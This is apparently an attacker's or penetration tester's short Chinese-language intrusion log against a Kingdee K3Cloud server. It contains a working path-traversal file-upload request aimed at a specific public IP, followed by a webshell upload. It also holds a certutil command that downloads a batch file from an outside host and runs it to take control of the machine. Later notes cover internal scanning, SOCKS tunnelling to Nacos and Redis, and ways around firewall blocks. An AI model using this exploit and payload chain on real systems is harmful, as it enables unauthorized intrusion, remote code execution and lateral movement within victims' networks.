内网报告
2025年6月29日大约 1 分钟
0x00.入口点
POST /k3cloud/SRM/ScpSupRegHandler HTTP/1.1
Host: 59.45.53.150:9888
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=zsqxokga
Accept-Encoding: gzip
Content-Length: 276
--zsqxokga
Content-Disposition: form-data; name="dbId_v"
.
--zsqxokga
Content-Disposition: form-data; name="FID"
2022
--zsqxokga
Content-Disposition: form-data; name="FAtt"; filename="../../../../uploadfiles/ccc.txt"
Content-Type: text/plain
ccc
--zsqxokga--生成马
上传成功
0x01.突破隔离内网
certutil.exe -urlcache -split -f http://110.42.44.69:8084/swt C:\Users\Public\run.bat && C:\Users\Public\run.bat上线命令
![[fscan.txt]]
建立隧道,扫描内网
内网nacos服务
0x02.成果
在nacos配置文件中,发现内网redis数据库。
0x03. 重新搭建内网隧道
两天后,发现vshell失效,并且内网隧道搭建失败,防火墙阻断了来自本远端ip的连接,或是阻断来自控制的内网主机的连接具体原因如下
启动隧道,尝试测试隧道
┌──(root㉿localhost)-[/etc]
└─# curl --socks5-hostname 120.46.10.222:6028 192.168.30.31/nacos
<head><title>文档已移动</title></head>
<body><h1>对象已移动</h1>可在<a HREF="./k3Cloud/Error.html">此处</a>找到该文档</body>
所有协议访问均被防火墙截断
解决方案
| 替代方案 |
|---|
| netsh(系统自带)或 plink |
| FreeCap 或 SocksCap64 |
netsh转发远端frps端口流量到其他端口,FreeCap或其他工具作为其他端口的socks5服务器